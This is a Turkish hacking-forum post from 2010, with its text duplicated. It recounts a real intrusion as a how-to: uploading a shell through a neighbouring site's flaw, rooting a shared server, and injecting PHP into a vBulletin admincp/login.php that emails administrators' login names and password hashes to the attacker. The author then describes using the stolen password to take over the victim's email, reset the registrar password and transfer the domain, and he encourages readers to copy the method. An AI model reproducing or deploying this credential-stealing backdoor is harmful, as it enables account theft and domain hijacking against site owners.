- 2 Ara 2010
- 26
- 0
Tamamen tarafım HackerByStar tarafından bulunmuş yeni bir yöntem bu yeni veya eski olanların sonuna kadar okumasını tavsiye ederim...
Domain Hack Farklı Bir Yöntem
Bu Konuda Başımdan Geçen Bir Domain Hack Yöntemini Yazacam, Sadece Tecrübe Edinebilmeniz İçin Yazılmıştır.
Geçtiğimiz Günlerde Bir Servere Girdim Serverdeki Sitelerden Birinin Domaini’ni Almam Gerekiyordu. Biraz Düşündüm Ne Yapabilirim Diye ve Sonuç Olarak Aşağıda Yazdığım Yöntemle Hedef Sitenin Domainini Aldım.
Önce Hedef Site Üzerinde Bir İnceleme Yaptım, Ancak Site VBulletin Son Sürümüydü ve Lisanslı Bir VB Script Kullanmaktaydı. Hal Böyle Olunca Serverdeki Diğer Siteleri İncelemeye Geçtim. www.*******.com da Açık Buldum Açık Sayesinde Servere Shell Upload Edip Bağlandım. Serveri Rootladım ve Hedef Siteye Ulaştım. Ancak İndex Atmadım. Amacım İndex Atıp Çıkmak Değildi. Domaini Almaktı.
Sitenin admincp/login.php Dosyasını Çektim. İçine Kendi Yazdığım Kodu Enjecte Edip Kapattım. Aradan Bir Hafta Geçti Mailime Eklediğim Kod Sayesinde Bir Şifre Geldi. Adam Sitesine 1 Hafta Sonra Giriş Yapmış.
Şifreyi Alıp Adamın Mail Adresinde Denedim ve Mailini Aldım. Mailden Domain Firmasına Şifremi Unuttum Diyerek Şifre İstedim. ve Parola Sıfırlama Geldi. Buradan Yeni Bir Şifre Belirleyerek Domain Paneline Girdim. Domain Transfer İşlemleri vs Derken Görevi Tamamladım.
admincp/Login.php ye Yerleştirdiğim Kod Aşağıdadır.
$kime="[email protected]";
$baslik="site şifreleri";
$ZyX.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$ZyX.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$ZyX.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $ZyX);
Bunu Anlatmamdaki Sebep Sadece SQL, RFI, LFI, Vb. Açıklarla Hack Yapılmayacağını Belirtmektir. ve Farklı Bir Yöntem Olduğu İçin Ek bir Bilginiz Olsun İstedim.
Sizlerde Girdiğiniz Sitelere Sadece İndex Atıp Çıkmak Yerine Hack’i Zevkli Hale Getirmeyi Denemelisiniz. Küçük Bir PHP Kodlama Bilgisi Sizi Daha İyi Yerlere Getirecektir.
Allah’a Emanet
HackerByStar
Domain Hack Farklı Bir Yöntem
Bu Konuda Başımdan Geçen Bir Domain Hack Yöntemini Yazacam, Sadece Tecrübe Edinebilmeniz İçin Yazılmıştır.
Geçtiğimiz Günlerde Bir Servere Girdim Serverdeki Sitelerden Birinin Domaini’ni Almam Gerekiyordu. Biraz Düşündüm Ne Yapabilirim Diye ve Sonuç Olarak Aşağıda Yazdığım Yöntemle Hedef Sitenin Domainini Aldım.
Önce Hedef Site Üzerinde Bir İnceleme Yaptım, Ancak Site VBulletin Son Sürümüydü ve Lisanslı Bir VB Script Kullanmaktaydı. Hal Böyle Olunca Serverdeki Diğer Siteleri İncelemeye Geçtim. www.*******.com da Açık Buldum Açık Sayesinde Servere Shell Upload Edip Bağlandım. Serveri Rootladım ve Hedef Siteye Ulaştım. Ancak İndex Atmadım. Amacım İndex Atıp Çıkmak Değildi. Domaini Almaktı.
Sitenin admincp/login.php Dosyasını Çektim. İçine Kendi Yazdığım Kodu Enjecte Edip Kapattım. Aradan Bir Hafta Geçti Mailime Eklediğim Kod Sayesinde Bir Şifre Geldi. Adam Sitesine 1 Hafta Sonra Giriş Yapmış.
Şifreyi Alıp Adamın Mail Adresinde Denedim ve Mailini Aldım. Mailden Domain Firmasına Şifremi Unuttum Diyerek Şifre İstedim. ve Parola Sıfırlama Geldi. Buradan Yeni Bir Şifre Belirleyerek Domain Paneline Girdim. Domain Transfer İşlemleri vs Derken Görevi Tamamladım.
admincp/Login.php ye Yerleştirdiğim Kod Aşağıdadır.
$kime="[email protected]";
$baslik="site şifreleri";
$ZyX.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$ZyX.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$ZyX.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $ZyX);
Bunu Anlatmamdaki Sebep Sadece SQL, RFI, LFI, Vb. Açıklarla Hack Yapılmayacağını Belirtmektir. ve Farklı Bir Yöntem Olduğu İçin Ek bir Bilginiz Olsun İstedim.
Sizlerde Girdiğiniz Sitelere Sadece İndex Atıp Çıkmak Yerine Hack’i Zevkli Hale Getirmeyi Denemelisiniz. Küçük Bir PHP Kodlama Bilgisi Sizi Daha İyi Yerlere Getirecektir.
Allah’a Emanet
HackerByStar